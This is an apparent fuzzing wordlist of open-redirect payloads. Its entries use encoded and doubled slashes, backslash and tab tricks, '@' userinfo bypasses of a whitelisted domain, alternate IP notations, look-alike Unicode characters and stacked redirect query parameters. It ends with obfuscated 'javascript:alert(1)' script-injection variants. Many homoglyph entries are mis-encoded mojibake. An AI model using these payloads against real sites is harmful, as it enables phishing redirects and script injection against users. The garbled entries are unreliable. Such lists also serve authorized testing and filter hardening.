
%2fgoogle.com
%2fgoogle.com%2f%2f
%2fgoogle.com//
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
&lt;&gt;//google.com
../google.com
/%09/google.com
/%09/www.whitelisteddomain.tld@google.com
/%09/â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
/%0D/google.com
/%2F/google.com
/%2f%2f%2fbing.com%2f%3fwww.omise.co
/%2f%2fexample.com
/%2f%2fgoogle.com
/%2f%2fâ“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
/%5Cgoogle.com
/%5cexample.com
/%5cgoogle.com
/%5cwww.whitelisteddomain.tld@google.com
/%5câ“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/&lt;&gt;//google.com
/.example.com
/.google.com
/.â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
//%09/example.com
//%09/google.com
//%09/www.whitelisteddomain.tld@google.com
//%09/â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
//%2F/google.com
//%2f%2fgoogle.com
//%2f%2fâ“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
//%2fxgoogle.com
//%5cexample.com
//%5cgoogle.com
//%5cwww.whitelisteddomain.tld@google.com
//%5câ“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
///%09/example.com
///%09/google.com
///%09/www.whitelisteddomain.tld@google.com
///%09/â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
///%5cexample.com
///%5cgoogle.com
///%5cwww.whitelisteddomain.tld@google.com
///%5câ“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
////%09/example.com
////%09/google.com
////%09/www.whitelisteddomain.tld@google.com
////%09/â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
////%5cexample.com
////%5cgoogle.com
////%5cwww.whitelisteddomain.tld@google.com
////%5câ“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
/////example.com
/////example.com/
/////google.com
/////google.com/
/////â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
/////â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/
////216.58.214.206
////3627734734
////\;@example.com
////example.com/
////example.com/%2e%2e
////example.com/%2e%2e%2f
////example.com/%2f%2e%2e
////example.com/%2f..
////example.com//
////google.com
////google.com/
////google.com/%2e%2e
////google.com/%2e%2e%2f
////google.com/%2f%2e%2e
////google.com/%2f..
////google.com//
////www.google.com/%2e%2e
////www.google.com/%2e%2e%2f
////www.google.com/%2f%2e%2e
////www.whitelisteddomain.tld@google.com/
////www.whitelisteddomain.tld@google.com/%2f..
////www.whitelisteddomain.tld@google.com//
////www.whitelisteddomain.tld@www.google.com/%2e%2e
////www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
////â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/
////â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/%2e%2e
////â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/%2e%2e%2f
////â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/%2f%2e%2e
////â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/%2f..
////â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚//
///216.58.214.206
///3627734734
///\;@example.com
///example.com
///example.com/
///example.com/%2e%2e
///example.com/%2e%2e%2f
///example.com/%2f%2e%2e
///google.com
///google.com/
///google.com/%2e%2e
///google.com/%2e%2e%2f
///google.com/%2f%2e%2e
///google.com/%2f..
///google.com//
///www.google.com/%2e%2e
///www.google.com/%2e%2e%2f
///www.google.com/%2f%2e%2e
///www.whitelisteddomain.tld@google.com/
///www.whitelisteddomain.tld@google.com/%2f..
///www.whitelisteddomain.tld@google.com//
///www.whitelisteddomain.tld@www.google.com/%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
///â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
///â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/
///â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/%2e%2e
///â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/%2e%2e%2f
///â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/%2f%2e%2e
///â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/%2f..
///â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚//
//216.58.214.206
//3627734734
//\/google.com/
//\/â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/
//\google.com
//google%00.com
//google%E3%80%82com
//google.com
//google.com/
//google.com/%2E%2E
//google.com/%2F.. 
//google.com/%2e%2e
//google.com/%2e%2e%2f
//google.com/%2f%2e%2e
//google.com/%2f..
//google.com//
//google.com//%2F%2E%2E
//google.com\@www.whitelisteddomain.tld
//google.com\tgoogle.com/
//https:///google.com/%2e%2e
//https:///www.google.com/%2e%2e
//https:///â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/%2e%2e
//https://google.com/%2e%2e%2f
//https://google.com//
//https://www.google.com/%2e%2e%2f
//https://www.whitelisteddomain.tld@google.com//
//https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
//https://â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/%2e%2e%2f
//https://â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚//
//localdomain%E3%80%82pw
//www.google.com/%2e%2e
//www.google.com/%2e%2e%2f
//www.google.com/%2f%2e%2e
//www.whitelisteddomain.tld@google.com/
//www.whitelisteddomain.tld@google.com/%2f..
//www.whitelisteddomain.tld@google.com//
//www.whitelisteddomain.tld@https:///www.google.com/%2e%2e
//www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
//www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
//â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
//â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/
//â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/%2e%2e%2f
//â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/%2f%2e%2e
//â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/%2f..
//â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚//
/216.58.214.206
/3627734734
/<>//google.com
/?url=//google.com&next=//google.com&redirect=//google.com&redir=//google.com&rurl=//google.com&redirect_uri=//google.com
/?url=/\/google.com&next=/\/google.com&redirect=/\/google.com&redirect_uri=/\/google.com
/?url=Https://google.com&next=Https://google.com&redirect=Https://google.com&redir=Https://google.com&rurl=Https://google.com&redirect_uri=Https://google.com&lt;br/&gt;/\/\/google.com/
/\/\/google.com/
/\/google.com
/\/google.com/
/\/â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/
/\216.58.214.206
/\3627734734
/\google%252ecom
/\google.com
/\victim.com:80%40google.com
/google.com
/google.com/%2F.. 
/google.com/%2f%2e%2e
/http://google.com
/http:/google.com
/http:/â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
/https:/%5cgoogle.com/
/https:/%5câ“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/
/https://%5cgoogle.com
/https://%5cwww.whitelisteddomain.tld@google.com
/https://%5câ“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
/https:///www.google.com/%2f%2e%2e
/https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https:///â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/%2f%2e%2e
/https://google.com/
/https://google.com/%2e%2e
/https://google.com/%2f%2e%2e
/https://google.com/%2f..
/https://www.google.com/%2e%2e
/https://www.google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@google.com/
/https://www.whitelisteddomain.tld@google.com/%2f..
/https://www.whitelisteddomain.tld@www.google.com/%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https://â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/
/https://â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/%2e%2e
/https://â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/%2f%2e%2e
/https://â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/%2f..
/https:google.com
/redirect?url=//google.com&next=//google.com&redirect=//google.com&redir=//google.com&rurl=//google.com&redirect_uri=//google.com
/redirect?url=Https://google.com&next=Https://google.com&redirect=Https://google.com&redir=Https://example.com&rurl=Https://google.com&redirect_uri=Https://google.com
/ã€±google.com
/ã€±â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
/ã€µgoogle.com
/ã‚google.com
/ãƒ¼google.com
/ï½°google.com
216.58.214.206
<>//google.com
<>//â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
\/\/google.com/
\/\/â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/
\152\141\166\141\163\143\162\151\160\164\072alert(1)
\\google.com
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
google%252ecom
google.com/.jpg
http:%0a%0dgoogle.com
http:%0a%0dâ“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://.google.com
http://.â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
http://00330.00072.0000326.00000316
http://00330.0x3a.54990
http://00330.3856078
http://0330.072.0326.0316
http://0xd8.072.54990
http://0xd8.0x3a.0xd6.0xce
http://0xd8.3856078
http://0xd83ad6ce
http://3627734734
http://[::ffff:216.58.214.206]
http://google.com%23.google.com/
http://google.com%2egoogle.com/
http://google.com%2f%2f.google.com/
http://google.com%3F.google.com/
http://google.com%5c%5c.google.com/
http://google.com:80#@www.whitelisteddomain.tld/
http://google.com:80%40google.com/
http://google.com:80?@www.whitelisteddomain.tld/
http://google.com\tgoogle.com
http:/\/\google.com
http:/google.com
http:/â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
http:google.com
http:www.whitelisteddomain.tld@00330.00072.0000326.00000316
http:www.whitelisteddomain.tld@00330.0x3a.54990
http:www.whitelisteddomain.tld@00330.3856078
http:www.whitelisteddomain.tld@0330.072.0326.0316
http:www.whitelisteddomain.tld@0xd8.072.54990
http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http:www.whitelisteddomain.tld@0xd8.3856078
http:www.whitelisteddomain.tld@0xd83ad6ce
http:www.whitelisteddomain.tld@3627734734
http:www.whitelisteddomain.tld@472.314.470.462
http:www.whitelisteddomain.tld@[::216.58.214.206]
http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http:â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
https%3a%2f%2fgoogle.com%2f
https:/%5cgoogle.com/
https:/%5câ“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚/
https://%09/google.com
https://%09/www.whitelisteddomain.tld@google.com
https://%09/â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
https://%0a%0dgoogle.com
https://%0a%0dâ“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
https://%5cgoogle.com
https://%5cwww.whitelisteddomain.tld@google.com
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
https:///www.google.com/%2e%2e
https:///www.google.com/%2f%2e%2e
https:///www.whitelisteddomain.tld@www.google.com/%2e%2e
https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https://:@google.com\@www.whitelisteddomain.tld
https://google%E3%80%82com
https://google.com
https://google.com/
https://google.com/%2f..
https://google.com//
https://google.com/https://google.com/
https://www.google.com/%2e%2e%2f
https://www.google.com/%2f%2e%2e
https://www.whitelisteddomain.tld/https://www.google.com/
https://www.whitelisteddomain.tld@google.com
https://www.whitelisteddomain.tld@google.com/
https://www.whitelisteddomain.tld@google.com/%2f..
https://www.whitelisteddomain.tld@google.com//
https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https:/\google.com
https:google.com
https:â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
ja\nva\tscript\r:alert(1)
javascript:confirm(1)
javascript:prompt(1)
target.com/Â°evil.com
ã€±google.com
ã€±â“–ğ‘œğ—¼ğ•˜ğ•ğ‘’.ğ‘ğ‘œğ“‚
ã€µgoogle.com
ã‚google.com
ãƒ¼google.com
ï½°google.com